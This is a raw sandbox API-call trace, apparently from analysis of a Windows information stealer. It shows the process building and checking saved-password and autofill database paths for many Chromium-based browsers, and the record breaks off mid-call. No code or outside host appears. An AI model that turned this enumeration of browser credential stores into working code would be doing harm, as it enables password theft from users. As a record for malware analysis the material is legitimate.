GetProcessHeap () returned 0x740000 [0234.541] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.541] GetProcessHeap () returned 0x740000 [0234.541] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.542] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.543] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0234.543] GetProcessHeap () returned 0x740000 [0234.543] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x88) returned 0x75bdc8 [0234.543] GetProcessHeap () returned 0x740000 [0234.543] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.544] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0234.545] GetProcessHeap () returned 0x740000 [0234.545] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.545] GetProcessHeap () returned 0x740000 [0234.545] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.546] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.547] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0234.547] GetProcessHeap () returned 0x740000 [0234.547] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x98) returned 0x75bdd8 [0234.547] GetProcessHeap () returned 0x740000 [0234.547] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.549] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0234.549] GetProcessHeap () returned 0x740000 [0234.549] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.549] GetProcessHeap () returned 0x740000 [0234.550] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.550] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.551] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0234.551] GetProcessHeap () returned 0x740000 [0234.552] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xae) returned 0x75bdf0 [0234.552] GetProcessHeap () returned 0x740000 [0234.552] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.553] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0234.554] GetProcessHeap () returned 0x740000 [0234.554] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.554] GetProcessHeap () returned 0x740000 [0234.554] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.555] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.556] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0234.556] GetProcessHeap () returned 0x740000 [0234.556] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xaa) returned 0x75bde8 [0234.556] GetProcessHeap () returned 0x740000 [0234.556] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.558] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0234.558] GetProcessHeap () returned 0x740000 [0234.558] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.558] GetProcessHeap () returned 0x740000 [0234.558] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.647] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.649] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0234.649] GetProcessHeap () returned 0x740000 [0234.649] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x88) returned 0x75bdc8 [0234.649] GetProcessHeap () returned 0x740000 [0234.649] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.650] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0234.651] GetProcessHeap () returned 0x740000 [0234.651] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.651] GetProcessHeap () returned 0x740000 [0234.651] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.653] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.653] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0234.653] GetProcessHeap () returned 0x740000 [0234.653] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x98) returned 0x75bdd8 [0234.653] GetProcessHeap () returned 0x740000 [0234.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.655] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0234.655] GetProcessHeap () returned 0x740000 [0234.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.656] GetProcessHeap () returned 0x740000 [0234.656] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.657] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.658] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0234.658] GetProcessHeap () returned 0x740000 [0234.658] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa2) returned 0x75bdf0 [0234.658] GetProcessHeap () returned 0x740000 [0234.658] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.659] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0234.660] GetProcessHeap () returned 0x740000 [0234.660] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.660] GetProcessHeap () returned 0x740000 [0234.660] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.661] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.662] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0234.662] GetProcessHeap () returned 0x740000 [0234.662] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9e) returned 0x74b028 [0234.662] GetProcessHeap () returned 0x740000 [0234.662] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.663] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0234.664] GetProcessHeap () returned 0x740000 [0234.664] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b028 | out: hHeap=0x740000) returned 1 [0234.664] GetProcessHeap () returned 0x740000 [0234.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.665] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.666] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0234.666] GetProcessHeap () returned 0x740000 [0234.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7c) returned 0x75bdc8 [0234.666] GetProcessHeap () returned 0x740000 [0234.666] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.667] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0234.668] GetProcessHeap () returned 0x740000 [0234.668] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.668] GetProcessHeap () returned 0x740000 [0234.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.669] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.670] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0234.670] GetProcessHeap () returned 0x740000 [0234.670] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8c) returned 0x75bdd8 [0234.670] GetProcessHeap () returned 0x740000 [0234.670] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.671] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0234.671] GetProcessHeap () returned 0x740000 [0234.672] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.672] GetProcessHeap () returned 0x740000 [0234.672] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.673] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.673] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0234.673] GetProcessHeap () returned 0x740000 [0234.673] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x94) returned 0x75bdf0 [0234.673] GetProcessHeap () returned 0x740000 [0234.674] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.675] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0234.675] GetProcessHeap () returned 0x740000 [0234.675] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.675] GetProcessHeap () returned 0x740000 [0234.675] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.676] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.676] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0234.676] GetProcessHeap () returned 0x740000 [0234.677] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75bde8 [0234.677] GetProcessHeap () returned 0x740000 [0234.677] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.678] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0234.678] GetProcessHeap () returned 0x740000 [0234.678] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.679] GetProcessHeap () returned 0x740000 [0234.679] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.680] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.681] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0234.681] GetProcessHeap () returned 0x740000 [0234.681] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75bdc8 [0234.681] GetProcessHeap () returned 0x740000 [0234.681] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.682] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0234.683] GetProcessHeap () returned 0x740000 [0234.683] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.683] GetProcessHeap () returned 0x740000 [0234.683] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.684] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.770] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0234.770] GetProcessHeap () returned 0x740000 [0234.770] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75bdd8 [0234.770] GetProcessHeap () returned 0x740000 [0234.771] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.772] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0234.772] GetProcessHeap () returned 0x740000 [0234.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.773] GetProcessHeap () returned 0x740000 [0234.773] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.774] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.775] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0234.775] GetProcessHeap () returned 0x740000 [0234.775] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa4) returned 0x75bdf0 [0234.775] GetProcessHeap () returned 0x740000 [0234.776] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.777] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0234.778] GetProcessHeap () returned 0x740000 [0234.778] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.778] GetProcessHeap () returned 0x740000 [0234.778] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.779] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.780] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0234.780] GetProcessHeap () returned 0x740000 [0234.780] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74a650 [0234.780] GetProcessHeap () returned 0x740000 [0234.781] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.782] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0234.782] GetProcessHeap () returned 0x740000 [0234.782] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74a650 | out: hHeap=0x740000) returned 1 [0234.782] GetProcessHeap () returned 0x740000 [0234.782] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.783] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.784] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0234.785] GetProcessHeap () returned 0x740000 [0234.785] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75bdc8 [0234.785] GetProcessHeap () returned 0x740000 [0234.785] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.786] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0234.787] GetProcessHeap () returned 0x740000 [0234.787] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.787] GetProcessHeap () returned 0x740000 [0234.787] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.788] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.789] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0234.789] GetProcessHeap () returned 0x740000 [0234.789] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8e) returned 0x75bdd8 [0234.789] GetProcessHeap () returned 0x740000 [0234.789] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.791] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0234.791] GetProcessHeap () returned 0x740000 [0234.791] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.791] GetProcessHeap () returned 0x740000 [0234.791] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.792] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.793] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0234.793] GetProcessHeap () returned 0x740000 [0234.793] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x98) returned 0x75bdf0 [0234.793] GetProcessHeap () returned 0x740000 [0234.794] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.795] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0234.795] GetProcessHeap () returned 0x740000 [0234.795] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.796] GetProcessHeap () returned 0x740000 [0234.796] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.797] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.797] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0234.798] GetProcessHeap () returned 0x740000 [0234.798] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x94) returned 0x75bde8 [0234.798] GetProcessHeap () returned 0x740000 [0234.798] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.799] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0234.799] GetProcessHeap () returned 0x740000 [0234.800] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.800] GetProcessHeap () returned 0x740000 [0234.800] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.801] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.802] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0234.802] GetProcessHeap () returned 0x740000 [0234.802] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757298 [0234.802] GetProcessHeap () returned 0x740000 [0234.802] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.804] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0234.804] GetProcessHeap () returned 0x740000 [0234.805] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757298 | out: hHeap=0x740000) returned 1 [0234.805] GetProcessHeap () returned 0x740000 [0234.805] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.806] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.917] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0234.917] GetProcessHeap () returned 0x740000 [0234.917] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75bdd8 [0234.917] GetProcessHeap () returned 0x740000 [0234.918] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.919] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0234.920] GetProcessHeap () returned 0x740000 [0234.921] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.921] GetProcessHeap () returned 0x740000 [0234.921] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.922] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.923] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0234.923] GetProcessHeap () returned 0x740000 [0234.923] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74ac38 [0234.923] GetProcessHeap () returned 0x740000 [0234.923] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.925] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0234.925] GetProcessHeap () returned 0x740000 [0234.926] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ac38 | out: hHeap=0x740000) returned 1 [0234.926] GetProcessHeap () returned 0x740000 [0234.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.927] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.928] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0234.928] GetProcessHeap () returned 0x740000 [0234.928] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74aa40 [0234.928] GetProcessHeap () returned 0x740000 [0234.928] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.930] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0234.930] GetProcessHeap () returned 0x740000 [0234.930] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74aa40 | out: hHeap=0x740000) returned 1 [0234.931] GetProcessHeap () returned 0x740000 [0234.931] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.931] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.932] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0234.932] GetProcessHeap () returned 0x740000 [0234.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75bdc8 [0234.932] GetProcessHeap () returned 0x740000 [0234.933] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.934] PathFileExistsW 